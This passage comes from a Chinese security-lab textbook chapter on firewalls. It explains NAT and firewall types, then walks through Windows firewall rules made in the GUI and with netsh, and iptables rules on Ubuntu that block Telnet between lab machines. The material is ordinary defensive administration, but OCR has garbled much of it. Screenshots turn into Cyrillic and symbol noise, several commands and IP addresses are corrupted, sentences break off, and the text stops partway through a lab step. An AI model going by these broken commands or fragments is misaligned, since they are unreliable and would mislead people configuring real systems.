服务 器 的 响应 数据 包 回 到 МАТ 代理 时 .在 МАТ 代理 处 ,完成 数据 包 的 目标 IP 地 址 和 端 
口 向 真正 请 求 数据 的 内 部 网 络 中 某 台 主机 的 IP 地 址 和 端口 的 转换 。 

NAT 代理 一 方面 为 充分 使 用 有 限 的 IP 地 址 资源 提供 了 方法 , 另 一 方面 隐藏 了 内 部 
主机 的 IP 地 址 , 且 对 用 户 完全 透明 。 


8.2.2 防火 墙 分 类 


依据 所 处 的 网 络 位 置 和 防护 目标 ,防火 墙 可 以 分 为 个 人 防火 墙 和 网 络 防火 墙 两 类 。 

1. 个 人 防火 墙 

个 人 防火 墙 位 于 计算 机 与 其 所 连接 的 网 络 之 间 ,主要 用 于 拦截 或 阻 断 所 有 对 主机 构 
成 威胁 的 操作 。 个 人 防火 墙 是 运行 于 主机 操作 系统 内 的 软件 ,根据 安全 策略 制定 的 规则 
对 主机 所 有 的 网 络 信息 进行 监控 和 审查 ,包括 拦截 不 安全 的 上 网 程序 、 封 堵 不 安全 的 共享 
资源 及 端口 .防范 常见 的 网 络 攻击 等 ,以 保护 主机 不 受 外 界 的 非法 访问 和 攻击 ,其 主要 采 
用 的 是 包 过 滤 技 术 。 

2. 网 络 防火 墙 

网 络 防 火 墙 位 于 内 部 网 络 和 外 部 网 络 之 间 , 主 要 用 于 拦截 或 阻 断 所 有 对 内 部 网 络 构 
成 威胁 的 操作 。 网 络 防火 墙 的 硬件 和 软件 都 单独 进行 设计 ,由 专用 网 络 芯片 处 理 数 据 包 ， 
并 且 采 用 专用 操作 系统 平台 ,具有 很 高 的 效率 ,技术 上 集 包 过 滤 和 应 用 网 关 技 术 于 一 体 。 


8.3 Windows 个 人 防火 墙 配 置 实验 


8.3.1 实验 目的 


通过 配置 Windows 7 系统 自 带 的 防火 墙 ,实现 多 种 安全 策略 ,对 主机 所 有 的 网 络 信 
息 进 行 监控 和 审查 ,使 读者 深入 了 解 个 人 防火 墙 的 主要 功能 和 配置 方法 。 


8.3.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 Windows 系统 自 带 防火 墙 实现 如 下 功能 : 

(1) 利用 个 人 防火 墙 防范 不 安全 程序 及 端口 ; 

(2) 利用 个 人 防火 墙 配置 连接 安全 规则 ; 

(3) 利用 命令 行 工具 Netsh 配置 防火 墙 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Windows 7 操作 系统 ,与 互联 网 相连 ; 配置 Windows 防 
火 墙 和 netsh。 

netsh(Netword Shell) 是 Windows 系统 本 身 提供 的 功能 强大 的 网 络 配置 命令 行 工 
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具 , 可 以 实现 对 防火 墙 等 许多 网 络 设备 的 配置 。 
8.3.3 实验 步骤 


1. 查看 个 人 防火 墙 的 默认 规则 
打开 Windows 系统 的 自 带 防火 墙 , 其 界面 如 图 8. 1 所 示 。 


= ч" am © ч 
t [f › iM › KAREE ^ Windows OA 


使 用 Windows 防火 墙 来 帮助 保护 您 的 计算 机 


Windows НЕ ВА ВН Internet "ERR eO: Т. 
OKOE RPN? 
(rz mesmo 


W 9 sssxecmseo 


Ш 9 «sso 


图 8.1 Windows 自 带 防火 墙 


单 击 该 界面 左 侧 的 “高 级 设置 "项 ,查看 防火 墙 的 出 入 站 规则 、 连 接 安全 规则 ,如 图 8.2 
所 示 , 所 有 规则 双击 后 可 查看 详细 信息 。 

在 图 8. 1 中 , 单 击 * 人 允许 程序 和 功能 通过 Windows 防火 墙 ? 选 项 ,可 查看 系统 对 程序 
通信 是否 允许 的 情况 ,程序 通信 允许 情况 如 图 8. З 所 示 。 

2. 添加 出 入 站 规则 

添加 出 入 站 规则 可 实现 对 出 入 网 络 流量 的 管理 ,下 面 的 例子 在 防火 墙 中 添加 对 某 网 
站 的 访问 规则 ,拒绝 本 机 对 该 网 站 的 访问 请 求 。 

(1) 利用 ping 命令 获得 某 网 站 的 IP 地 址 ,如 图 8.4 所 示 。 

(2) 在 图 8.5 右 栏 中 单 击 “ 新 建 规则 ”项 新 建 出 站 规则 。 

G) 在 图 8. 6 所 示 的 界面 中 选择 要 创建 的 规则 类 型 为 “ 自 定义 ”, 单 击 “ 下 一 步 ” 按 钮 。 

(4) 在 图 8.7 中 指定 规则 应 用 于 所 有 程序 , 单 击 “ 下 一 步 ”按钮 。 

(5) 在 图 8. 8 的 “协议 与 端口 "界面 中 ,指定 “协议 类 型 "为 TCP,“ 本 地 端口 ”为 所 有 端 
口 , “远程 端口 ”为 特定 端口 ,端口 号 为 80, 单 击 “ 下 一 步 ” 按 钮 。 

(6) 在 图 8.9 所 示 的 “作用 域 ?界面 中 ,把 网 站 的 TP 地 址 添加 到 “此 规则 适用 于 哪些 
远程 IP 地址 ”中 , 单 击 “ 下 一 步 ”按钮 。 
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ВИЛ 上 的 高 极 安全 Windows MKIA 


Ш 5599 тоз: Wk iios immanem. 


mt 

域 配置 文件 

© Yindovs 防火 十 已 启用 。 

QQ 阻止 与 规则 不 匹配 的 入 站 连接 > 
Ө 允许 与 规则 不 区 配 的 出 站 连接 。 
专用 配置 文件 是 活动 的 

© vindos 防火 墙 已 启用 。 

© т=з. 
© хызыр. 
公用 配置 文件 

© vindos 防火 墙 已 启用 。 

QQ 阻止 与 规则 不 区 配 的 入 站 连接 
Ө 郊 许 与 规则 不 区 配 的 出 站 连接 。 
E) Vindos MAWE 


АП 
计算 机 之 间 的 身份 验证 通信 
йазасәндишткин Internet 协议 安全 性 (IPSec) 对 计算 机 之 间 的 连接 


加 连接 安全 规则 
查看 和 创建 防火 墙 规则 


дууга T aime 
б 


CBranchCache - FERFE РЕЧТЕ НТТР) 
осы ш 

Media Center Extender 

DNetiogon Bi 

'ZSNMP Trap. 


图 8.3 程序 通信 允许 情况 


© 
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E C\Windows\system32\cmd.exe 


Ping spool.grid 
202.102.94.124 上 
202.102.94.124 
202.102.94.124 
202.102.94.124 上 


94.124 的 Ping 


& 4, 


2.94.124] 
2ms TTL 


图 8.4 获取 网 站 IP 地址 及 其 连通 性 
Wd 高 级 安全 Windows lcs * > vow ^ мз Alibi cmo на ema me 
文件 (F) 操作 (A) 查看 (V) PERH) 
| 中 | 力 加 31 日 团 
@ 本 地 计算 机 гасе ОТНИ i 
E 入 站 规则 名 称 组 配置 文件 cem ~ ыа al 
реч 图 网 络 发 现 (UPnP-Out) 网 络 发 现 ы 5 | | 
% 连 控 安 全 规则 |i жеши 
-p @PAEMWSD Events-Out) MALM 公用 в | - 
= 加 网 络 发 现 (WSD Events-Out) MEAM 专用 是 т жашна t 
ORESENXQWSDEvents-Ovt MALM 域 в |Y вася , 
回 网络 发 现 (WSD EventsSecure-.. 网 络 发现 专用 是 | sema 
做 网 络 发 现 (WSD EventsSecure 公用 否 查看 b 
@ FERERRWSD EventsSecure 域 а | —— 
Q ISEXIWSD-Out) иаа = |9 ж 
加 网 络 发 现 (WSD-Out) 专用 是 导出 列表 
个 文件 和 打印 机 共享 (LLMNR-UD.。 文件 和 打印 机 共享 所 有 & |H vem 
文件 和 打印 机 共享 (NB-Datagra..， 文 件 和 打印 机 共享 专用 ,公用 S 
重文 件 和 打印 机 共享 (NB-Datagra.。 文件 和 打印 机 闪 域 # 远程 协助 (PNRP-Out) f 
ly © HOFTER (NB-Name-O... EOFT 专用 公用 S | amau 
i 重文 件 和 打印 机 共享 (NB-Name-O-， 文件 和 打印 机 共享 域 & ї тш | 
和 文件 和 打印 机 共享 (NB-Session-.， 文 件 和 打印 机 共享 ч а 
图 文件 和 打印 机 共享 (NB-Session-… 专用 ,公用 S [3 
重文 件 和 打印 机 共享 (SMB-Out) 文件 和 打印 机 共享 域 = |ж me 
做 文件 和 打印 机 共享 (SMB-Out) 文件 和 打印 机 共享 专用 ,公用 S lH шт 
重文 件 和 打印 机 共享 ( 回 显 请 求 - IC. 文件 和 打印 机 共享 = в Jg za 
重文 件 和 打印 机 共享 ( 回 显 请 求 - IC 文件 和 打印 机 共享 专用 ,公用 S | 
巍 文 件 和 打印 机 共享 ( 回 显 请 求 IC.. 文件 和 打印 机 共享 я 
重文 件 和 打印 机 共享 ( 回 显 请 求 -IC.. 文件 和 打印 机 共享 专用 ,公用 S | 
Ө 无 线 便 斤 式 设备 (SS5DP-Out) KRENE 所 有 否 | 
才 无 线 全 的 式 设备 (TCP-Out) 无 线 便携 设备 专用 ,公用 S -l 
Mmana rren nue солма аа ж | 
т AE » | 
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规则 类 型 
选择 要 创建 的 防火 墙 规则 类 型 


要 创建 的 规则 类 型 


Онт) 
控制 程序 连接 的 规则 。 
orno 
控制 TCP 或 UDP ROER. 
司 预定 X(E): 
[Branchcache ~ ИЖИ CET VD) 
控制 паси: (ЖЫПЛЕЙЕ ТИ. 


9 自 定义 (C) 
自 定义 规则 。 


指定 此 规则 匹配 的 程序 的 完整 程序 路径 和 可 执行 程序 名 称 。 


该 规则 应 用 于 所 有 程序 还 是 特定 程序 ? 


э тина) 
规 风 应 用 于 与 其 他 直 风 后 性 相 区 配 的 计 牙 机 上 的 所 有 过 接 
© йняин‹}: 
[ _ 
DNE S e 


8.7 指定 所 有 程序 
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жаю яна йу? 


协议 类 型 (E); 
WSW: 


ERROU: 


ЖАЙ: 80, 443. 5000-5010 
CO: 


3 
示例 : во, 443. 5000-5010 
Internet IANAO iR: [ESSO 


作用 域 
指定 要 应 用 此 规则 的 本 地 和 这 程 IP 地址 ， 


8.9 添加 远程 地 址 


(7) 在 图 8. 10 所 示 的 “操作 ”界面 中 ,选择 “阻止 连接 ”, 单 击 “ 下 一 步 ”按钮 。 
(8) 在 图 8. 11 所 示 的 “配置 文件 ”界面 中 按 需 选择 此 规则 的 使 用 范围 , 单 击 “ 下 一 步 ” 
按钮 。 


(9) 在 图 8. 12 所 示 的 “名 称 ” 界 面 中 添加 规则 名 称 及 描述 , 单 击 “ 完 成 ”按钮 ,出 站 规 
则 添加 成 功 。 
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"f 
指定 在 连接 与 规则 中 指定 的 条 件 相 匹 配对 要 执行 的 接 作 。 


se: 
规则 类 型 
ал DELL 


ЖИЕНӘШЕВЇИЕНЕЯНТ ДИНЕ? 


协议 和 端口 这 包括 使 用 IPsec 保护 以 及 未 使 用 IPsec 保护 的 连接 * 


. 
. 

• tmm 全 只 允许 安全 连接 (c) _ К 

+ юй ЕЗЕЕН Ises ENER. 使用 ecc TUPNREURERR SE 
e n 


配置 文件 
ай 


图 8.10 阻止 连接 


配置 文件 
指定 此 规则 应 用 的 配置 文件 
se: 
规则 类 型 
ы 
мо) 


Ии уишн. 
fERM. 


专用 (P) 
-一 кишене яши ит. 


ЕЕЕ 公用 (0) 
э» 计算 机 连接 到 公用 网 络 位 置 时 应 用 。 


图 8.11 选择 使 用 范 


эю: 
жЕ. 


semam: 
вілкамі 


图 8.12 规则 名 称 及 描述 


(10) 打开 浏览 器 发 现 无 法 访问 某 网 站 ,如 图 8. 13 所 示 ,说 明 刚刚 配置 的 防火 墙 规则 
起 作用 了 。 


JO бә pywwsanacmcov 

week w peaa Man” 

/ Internet Explorer FAET- Rs EP eS IRO- 9- " 
@ Internet Explorer 无 法 显示 该 网 页 


您 可 以 尝试 以 下 操作 : 


8.13 网 站 访问 被 阻止 


3. 防范 不 安全 的 程序 
添加 程序 出 站 规则 可 实现 对 特定 程序 访问 网 络 .端口 的 管理 ,下 面 添加 一 条 规则 阻止 
Chrome 浏览 器 对 网 络 的 访问 。 
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(1) 按 上 例 相 同 的 方法 , 单 击 图 8. 14 右 栏 的 “新 建 规则 ”项 以 新 建 程序 出 站 规则 。 


Ө 5518 (TCP-Out) 
@15С51 Ж=(ТСР-Ош) 
© Media Center Extender - qW... Media Center Exten... 
еа Center Extender - qW.. Media Center Exten... 
© Media Center Extender - RTS... Media Center Exten... 
© Media Center Extender - SSD... Media Center Exten... 
ledia Center Extender - UPn... Media Center Exten... 
Ө Media Center Extender - WM... Media Center Exten... 
Ө Media Center Extender - 服务.… Media Center Exten... 
ledia Center Extender - ЖЖ... Media Center Exten... 
@ Media Center Extender - 184... 
© Media Center Extender - 设备 . 
Ө Media Center Extender - 设备 . 


8 


качаан Чини 


111111 ng 
á 


‹ 


图 8.14 添加 出 站 规则 


(2) 在 图 8. 15 所 示 界 面 中 ,选择 要 创建 规则 的 类 型 ,这 里 选择 “程序 ”, 单 击 “ 下 一 步 ” 
按钮 。 


С 


规则 类 型 
选择 要 创建 的 防火 墙 规则 类 型 


i Benton 

T 

PME en 

es бяпо 

uius 控制 TCP 或 ШР жп. 
OREX: 


[Branch£ache -对 等 机 发 观 (使 用 VD) - 
控制 плат: аена). 


17540) 
BENUA. 


[上 Ea eee em 


图 8.15 选择 规则 类 型 
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G) 在 图 8. 16 所 示 界 面 中 指定 程序 路 径 ,这 里 选择 Chrome 程序 路 径 , 单 击 “ 下 一 


JU BHL. 


жй S DE RESET RT 


该 规则 应 用 于 所 有 程序 还 是 特定 程序 ? 


D 所 有 程序 CA) 
规则 应 用 于 与 其 他 规则 拔 性 相 苞 配 的 计算 机 上 的 所 有 连接 - 


9 此 程序 路 径 (T) : 
С:\Ргогал Files\Google\Chrone\Application\chrone, exe ETIO 


жй: с:\ра\һ\рго таа. еле 
XProgranFi LeshVorovser browser. exe 


тиштїї аө 


[ease [т-®®@›)[ ва) 


指定 阻止 的 程序 路 径 


图 8. 16 


(4) 在 图 8. 17 所 示 界 面 中 指定 出 站 连接 与 规则 中 指定 的 条 件 匹配 时 的 操作 ,这 里 选 
择 * 阻 止 连接 ”, 单 击 * 下 一 步 ? 按 钮 ,设置 规则 作用 域 和 规则 名 称 , 规 则 名 称 为 “禁止 


Chrome", 
[Preces И — 7H 7E — NEA ы шш 
E | 
指定 在 连接 与 规 出 中 指定 的 条 件 相 匹配 时 要 执行 的 拓 作 。 
va: 
em ари 
+ 程序 с йаша) 
m TAMRA Росс 保护 以 及 未 使 用 IPsec 保护 的 连接， 
+ RHxn = 只 允许 安全 连接 (C) 
. zt IPsec 进行 ü Я IPsec LUI 
hn OSEE QD OUISIMUEDER. MA IPsec деепонцраяяен 
© mitt 
хів [下 一 步 @) > BA | 


图 8.17 阻止 程序 连接 


第 8 章 防火 墙 


(5) 规则 设置 完成 后 ,打开 Chrome 浏览 器 ,访问 网 站 时 ,出 现 如 图 8. 18 所 示 的 界 
,可 以 看 到 Chrome 无 法 连接 网 络 ,说 明 刚 刚 配 置 的 防火 墙 规则 起 作用 了 。 


E 


x + E 


o 


图 8.18 Chrome 浏览 器 被 阻止 

4. 使 用 netsh 配置 防火 墙 

在 提供 界面 操作 的 同时 , Windows 系统 下 的 netsh. exe 文件 还 提供 对 防火 墙 等 网 终 
设置 的 命令 行 配置 方法 ,便于 远程 管理 

D 查看 防火 墙 

在 命令 行 下 打开 netsh 工具 ,输入 “advfirewall firewall”, 切 换 到 防火 墙 配置 的 高 级 
模式 ,如 图 8. 19 所 示 


B EA: C\Windows\system32\cmd.exe - netsh | 


C:\>netsh Г 
netsh»adufirewall firewall Йй 
netsh adufirewall firewall» 


图 8.19  advfirewall firewall 命令 


© 
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输入 “show rule name 王 all”, 查 看 防火 墙 的 所 有 规则 ,如 图 8. 20 .图 8. 21 所 示 。 


Er EEA: C\Windows\system32\cmd.exe - netsh | 


С:\>пеёѕћ 
|Inetsh»adufirewall firewall 
netsh adufirewall firewall»show rule name-all,, 


图 8.20 查看 防火 墙 的 所 有 规则 


Eri EA: C\Windows\system32\cmd.exe - netsh 


Netlogon 服务 


[netsh adufirewall firewall», ad 


图 8.21 显示 防火 墙 的 所 有 规则 


fij A “firewall show logging”, 可 查看 防火 墙 配置 记录 ,如 图 8. 22 所 示 。 
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9 EA: C\Windows\system32\cmd.exe - netsh 


|C: N»netsh 
netsh»adufirewall 
netsh adufirewall»firewall show logging 


使 用 “netsh adufirewall firewall 
有 关 使 用 “netsh adufirewall fi 
而 非 “netsh firewall" [fifi Fd 
http://90.microsoft .com/fwlink/?1inkid:121488 
上 的 KB 文章 947709. 


netsh adufirewall», 


图 8.22 查看 防火 墙 配置 记录 
2) 防火 墙 的 开启 与 关闭 
在 “netsh advfirewall” 环 境 下 ,输入 “set allprofile state on|off”, 可 实现 防火 墙 的 开启 
或 关闭 ,如 图 8.23 Bros. 


C:\Windows\system32\cmd.exe - netsh 


C:\>netsh 

netsh>adufirewall 

netsh adufirewall>set allprofile state off 
确定 。 


netsh adufirewall>。 


关闭 防火 墙 
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3) 端口 的 开启 与 关闭 


在 “netsh advfirewall” 环 境 下 ,输入 “firewall ааа | delete portopening TCP | UDP” hp 


端口 值 ,可 实现 指 % 
UDP 138 端口 的 开启 。 


口 的 开启 或 关闭 ,如 图 8. 24、 图 


5 所 示 ,实现 对 TCP 445 端 


口 和 


C: NUsersNhope»netsh 
Inetsh»adufirewall 


netsh adufirewall»firewall add portopening TCP 445 "MyPort" enable all 


etsh firewall"; 
“netsh adufirewall firewal 
i 11 тне. 


3 EA: C:\Windows\system32\cmd.exe - netsh 人 


m 


图 8.24 开启 TCP 445 端口 


”enable а11 


etsh firewall"; 
“netsh adufirewall firewa 
“netsh adufirewall firewall 
"netsh firewall" Ё 
http://9o.microsoft. com/fwlink/?link 
上 的 KB 文章 947709. 


确定 。 


netsh adufirewall», 


25 开启 UDP 138 端口 
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4) 出 入 站 规则 配置 
在 “netsh advfirewall firewall” 环 境 下 ,输入 “show rule name 二 all”, 可 查看 防火 墙 的 
所 有 规则 ,输入 “delete rule пате=< string >”, 可 以 在 防火 墙 策 略 中 删除 一 条 规则 ,输入 
“all rule name=< string > dir=in|out|all action= allow | block | bypass [ргоїосо1==0— 255 ]”. 
可 在 防火 墙 策略 中 添加 入 站 或 出 站 规则 ,如 图 8. 26 所 示 ,删除 了 之 前 在 图 形 界面 中 所 设 
定 的 禁止 Chrome 浏览 器 访问 网 络 的 规则 。 


ШЙ EA: C\Windows\system32\cmd exe - netsh — 要 " 


IC: NUsersMhope»netsh 
Inetsh»adufirewall firewall 
netsh advfirewall firewall»delete rule "Jf iFChrome" 


1 规则 。 


netsh adufirewall firewall», 


图 8.26 删除 


禁止 Chrome" Hi Bil 


该 规则 删除 后 ,再度 利 用 Chrome 浏览 器 访问 网 络 则 顺利 返回 正常 页 面 , 如 图 8. 27 
所 示 。 


^\ 
新 征程 
新 使 命 


b EH “专栏 热点 жш ”看 江苏 : 
8 席 爹 砖 国 衣 领导 并 发 表 讲话 全 文 
4 视 快 评 


天 在 单线 衬衫 
Le В 


Chrome 正常 浏览 网 站 


Мф/ 信息 系统 安全 实验 教程 
ча 


8.4 Linux 个 人 防火 墙 配 置 实验 


8.4.1 实验 目的 


通过 配置 Linux 防火 墙 , 对 主机 所 有 的 网 络 信息 进行 监控 和 审查 ,可 以 使 读者 深入 了 
解 个 人 防火 墙 的 主要 功能 和 配置 方法 。 


8.4.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 Linux 系统 的 iptables 防火 墙 配置 连接 安全 规则 并 验证 。 

2. 实验 环境 

实验 网 络 拓扑 如 图 8. 28 Bros ,实验 需要 两 台 主流 配置 计算 机 ,一 台 作 为 靶 机 ,安装 
Linux(Ubuntu 14. 04) 系 统 ,IP 地 址 为 192. 168. 1. 20 ,配置 包 过 滤 防 火 墙 ; 一 台 作 为 攻击 
机 ,安装 Windows XP,IP 地 址 为 192. 168. 1. 55 .开启 Telnet 服务 ,如 图 8. 29 所 示 ,Linux 
主机 可 以 使 用 Telnet 远程 登录 攻击 机 ,如 图 8. 30 Р 8. 31 所 示 。 


E. 


EH 


攻击 机 
IP 地 址 : 192.168.1.55 IP 地 圳 : 192.168.1.20 
图 8.28 网 络 拓扑 


Telnet 的 属性 (本 地 计算 机 ) 
жя вя ка ках] 
服务 名 称 TlniSvr 
плава: BEEN 
mq ЗЕБРА ИЗНН НЕ ТЕА, 3E s 
可 执行 文件 的 路 径 Q0 : 
t WINDOWS Vsysten32WVtIntsvr. ехе 


启动 类 型 E): | 手动 


服务 状态 : 


BEG FED BEW 


当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 


图 8. 29 开启 Telnet 服务 
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© © kyo@kyo-ubuntu: ~ 
ping 192.168.1.55 -c 5 
.168.1.55 (192.168.1.55) 56(84) bytes of Чата. 
from 192.168.1. i T ttl-128 
from 192.168.1. i Ж ttl-128 
from 192.168.1.55: i x ttl-128 
from 192.168.1. i Ж ttl-128 
from 192.168.1. icmp_set ttl-128 


--- 192.168.1.55 ping statistics --- 
5 packets transmitted, 5 received, 9X packet loss, time 3997ms 
rtt min/avg/max/mdev 0.173/0.228/0.423/0.099 ms 


kyogkyo-ubuntu:-S li 


图 8.30 ping 连接 测试 成 功 


©Ө©®Ф® kyo@kyo-ubuntu: ~ 
kyo@kyo-ubuntu:~$ telnet 192.168.1.55 
тгуїпд 192.168.1.55... 

Connected to 192.168.1.55. 

Escape character is '^]'. 

Welcome to Microsoft Telnet Service 


Welcome to Microsoft Telnet Server. 


ж, 


C:\Documents and Ѕеёёіпоѕ\ Ғна11 .мдо> 


图 8.31 Telnet 远程 登录 


3. Iptables 防火 墙 简介 
Linux 系统 的 防火 墙 功 能 是 由 内 核实 现 的 : 2.0 版 内 核 中 , 包 过 滤 机 制 是 ipfw, 管 理 
Г.Д. Ж ipfwadm; 2. 2 版 内 核 中 , 包 过 滤 机 制 是 ipchain, 管 理工 具 是 ipchains; 2. 4 版 及 以 
后 的 内 核 中 , 包 过 滤 机 制 是 netfilter, 管 理工 具 是 iptables. 
Netfilter 位 于 Linux 内 核 中 的 包 过 滤 防 火 墙 功能 体系 中 , 称 为 Linux 防火 墙 的 “内 核 
态 ”。 bet 位 于 /sbin/iptables, 是 用 来 管理 防火 墙 的 命令 工具 ,为 防火 墙 体系 提供 过 
I/ 策略 ,决定 如 何 过 渡 或 处 理 到 达 防 火 墙 主机 的 数据 包 , 称 为 Linux 防火 墙 的 “用 户 
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态 ”。 习 惯 上 ,上 述 2 种 称呼 都 可 以 代表 Linux 防火 墙 。 

在 Linux 防火 墙 体 系 中 ,是 如 何 组 织 各 种 不 同 的 防火 墙 规则 来 实现 包 过 滤 功 能 的 呢 ? 

1) 规则 链 

规则 的 作用 在 于 对 数据 包 进 行 过 滤 或 处 理 , 根 据 处 理 时 机 的 不 同 , 各 种 规则 被 组 织 在 
不 同 的 “ 链 ” 中 ,规则 链 是 防火 墙 规则 /策略 的 集合 ,默认 的 5 种 规则 链 如 下 。 

* INPUT: 处 理 入 站 数据 包 。 
OUTPUT: 处 理 出 站 数据 包 。 
FORWARD: 处 理 转发 数据 包 。 
POSTROUTING 链 : 在 进行 路 由 选择 后 处 理 数据 包 。 

* PREROUTING 链 : 在 进行 路 由 选择 前 处 理 数据 包 。 

INPUT 链 用 于 处 理 访问 防火 墙 本 机 的 数据 ,OUTPUT 链 用 于 处 理 防 火 墙 本 机 访问 
其 他 主机 的 数据 ; FORWARD 链 用 于 处 理 需 要 经 过 防火 墙 转发 的 数据 包 , 源 地 址 .目标 
地 址 均 不 是 防火 墙 本 机 ; POSTROUTING, PREROUTING 链 分 别 用 于 在 确定 路 由 后 、 
确定 路 由 前 对 数据 包 进 行 处 理 。 在 “主机 防火 墙 ? 中 ,主要 针对 服务 器 本 机 进出 的 数据 实 
施 控 制 ,多 以 INPUT、OUTPUT 链 的 应 用 为 主 ; 在 “网 络 防 火 墙 ”中 ,主要 针对 数据 转发 
实施 控制 , 特别 是 防火 墙 主 机 作为 网 关 使 用 时 的 情况 ,因此 多 以 FORWARD, 
PREROUTING, POSTROUTING 链 的 应 用 为 主 。 

2) 规则 表 

具有 某 一 类 相似 用 途 的 防火 墙 规则 ,按照 不 同 处 理 时 机 区 分 到 不 同 的 规则 链 以 后 ,被 
归 置 到 不 同 的 “ 表 ” 中 ,规则 表 是 规则 链 的 集合 。 系 统 默 认 的 4 个 规则 表 如 下 : 

*oraw Ж: 确定 是 否 对 该 数据 包 进 行 状 态 跟 踪 。 
mangle 表 : 为 数据 包 设 置 标记 。 
nat Ж: 修改 数据 包 中 的 源 、 目 标 ТР 地 址 或 端口 。 
filter X: 确定 是 否 放 行 该 数据 包 ( 过 滤 )。 

其 中 filter 表 、nat 表 最 常用 。 规 则 表 间 的 优先 顺序 依次 为 raw — mangle— nat 
filter。 

规则 链 间 的 匹配 顺序 如 下 : 

CD 入 站 数据 : PREROUTING 一 INPUT。 

(2) 出 站 数据 : OUTPUT POSTROUTING。 

G) 转发 数据 : PREROUTING > FORWARD > POSTROUTING。 

规则 链 内 的 匹配 顺序 : 按 顺序 依次 进行 检查 ,找到 相 匹 配 的 规则 即 停止 (LOG 策略 
除外 ) ,车 找 不 到 相 匹 配 的 规则 , 则 按 该 链 的 默认 策略 处 理 。 

3) 规则 语法 

iptables 命令 的 语法 格式 : 

iptables [-t X4] 管理 选项 [ 链 名 ] [条 件 匹 配 ] [-j 目标 动作 或 跳 转 ] 


几 个 注意 事项 : 
不 指定 表 名 时 ,默认 表示 filter K; 不 指定 链 名 时 ,默认 表示 该 表 内 所 有 链 ; 除非 设 
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置 规则 链 的 默认 策略 ,否则 需要 指定 匹配 条 件 。 

维护 规则 表 的 命令 如 下 : 

CN) 创 建 一 个 新 规则 表 。 

(C-X) 删 除 一 个 空 规则 表 。 

(-P) 改 变 内 建 规则 表 的 默认 策略 。 

CL) 列 出 规则 表 中 的 规则 。 

CF) 清 空 规则 表 中 的 规则 。 

(-Z) 将 规则 表 计 数 器 清 零 。 

管理 规则 表 的 命令 如 下 : 

CA) 添加 新 规则 到 规则 表 。 

(了 DD) 插入 新 规则 到 规则 表 的 某 个 位 置 。 

CR) 替 换 规则 表 中 的 规则 。 

CD) 删 除 规则 表 中 的 某 条 规则 。 

查看 当前 防火 墙 配置 规则 sudo iptables -L -n, 如 图 8. 32 所 示 。 
Өе © kyo@kyo-ubuntu: ~ 
kyo@kyo-ubuntu:~$ sudo iptables -L -n 
[sudo] password for kyo: 
Chain INPUT (policy ACCEPT) 


target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
kyo@kyo-ubuntu:~$ 


图 8.32 查看 当前 防火 墙 配 置 规则 


8.4.3 实验 步骤 


1. 配置 安全 策略 1 

(1) 安全 规则 设置 。 由 于 Telnet 服务 对 传输 的 信息 没有 加 密 , 因 而 禁止 Linux 通过 
Telnet 访问 Windows 系统 。 配 置 防火 墙 规则 以 落实 安全 策略 ,可 通过 向 OUTPUT 表 中 
添加 相应 包 过 滤 规 则 实现 ,具体 命令 : iptables -A OUTPUT -p tcp -s 192. 168. 1. 20 -d 
192. 168. 1. 55 --dport 23 -j DROP, 如 图 8. 33 所 示 。 


Фф 


«р 
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Фе kyo@kyo-ubuntu: ~ 
kyo@kyo-ubuntu:~$ sudo iptables -A OUTPUT -p tcp -S 192.168.1.28 -d 192.168.1.55 --dport 23 -j DROP 
:-$ sudo iptables -L -n 


prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 

prot opt source destination 

tcp 192.168.1.20 192.168.1.55 tcp dpt:23 
Ikyogkyo-ubuntu:-S | 


图 8.33 增加 包 过 滤 规 则 


(2) 按 如 图 8. 34、 图 8. 35 所 示 的 命令 测试 防火 墙 规则 是 否 奏 如 
168. 1. 55 连接 失败 ,ping192. 168. 1. 55 连接 成 功 ,防火 墙 规 则 奏 竟 


OS® kyo@kyo-ubuntu: ~ 


kyo@kyo-ubuntu:~$ telnet 192.168.1.55 
р?" 192.168.1.55... 


图 8.34 telnet 失败 


Өе ® куо@куо-иһипїи:- 


kyogkyo-ubunt: 
PING 192.168.1 
64 bytes from 
64 bytes from 
64 bytes from 
64 bytes from 
64 bytes from 


- 192.168.1. 


5 
192 
192 
192 
192 
192 


ping 192.168.1.55 -с 5 
(192.168.1.55) 56(84) bytes of 


.168.1.55: icnp_se: 
.168.1.55: icmp seq-2 
EU 

EU 

.168.1.55: icnp_seq= 


55 ping statistics -- 


5 packets transmitted, S received, ӨХ packet loss, time 3998ms 
rtt inaug fax mdi = 0.132/0.179/0.288/0.056 ms 
5 


kyogkyo-ubunti 


图 8. 35 


2. 清除 上 述 安全 规则 


iptables -L 列 出 表 / 链 中 的 所 有 规则 , 包 过 滤 防 火 墙 只 使 用 filter 表 , 此 表 为 
表 。iptables -F 清除 预 设 表 filter 中 所 有 规则 ,如 图 8 


[LL ~ 


kyogkyo-ubunt: 
kyogkyo-ubunt: 


$ 
5 


sudo iptables -F 
sudo iptables -L - 


ping 成 功 


Chain INPUT (policy ACCEPT) 
Itarget prot opt source 


Chain FORWARD (policy ACCEPT) 
target prot opt source 


Chain OUTPUT (policy ACCEPT) 
target prot opt source 
kyogkyo-ubuntu:-S | 


destination 


destination 


destination 


清除 防火 墙 filter 表 中 所 有 规则 


«©» 
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3. 配置 安全 策略 2 


攻击 机 (Windows А96): 


在 系统 ) ,如 图 8. 37 所 示 。 


Windows 


XP [版 
有 1985-2081 Micr 


人 可 以 ping 通 19 


TEET 
ft Corp. 


168. 1. 20 (Linux 系统 ,也 


:NDocuments and Settings\fvall.MAO>ping 192.168.1.20 


ging 192.168.1.2@ with 32 bytes of data: 


ер1у from 192.168.1.2! 
eply from 192.168.1.2! 
ер1у from 192.168.1.20: 
eply fron 192.168.1.2! 


ing statistics for 
Packets: Sent = 4 


R 


2 time<ins 
2 tineCims 
bytes-32 time<ins 
bytes-32 time<ins 


192.168.1.20 


cei 


Approximate round trip tine 


Mininun 


[. 


Maximum 


Bns, Average 


:NDocuments and Settings\fuall.MAO>, 


即 防 火 墙 所 


(1) 设置 安全 策略 2: 


实现 ,具体 命令 : 


图 8.38 所 示 。 


OS® kyo@kyo-ubuntu: ~ 
kyogkyo-ubuntu 
kyogkyo-ubuntu 
Chain INPUT (policy ACCEPT) 
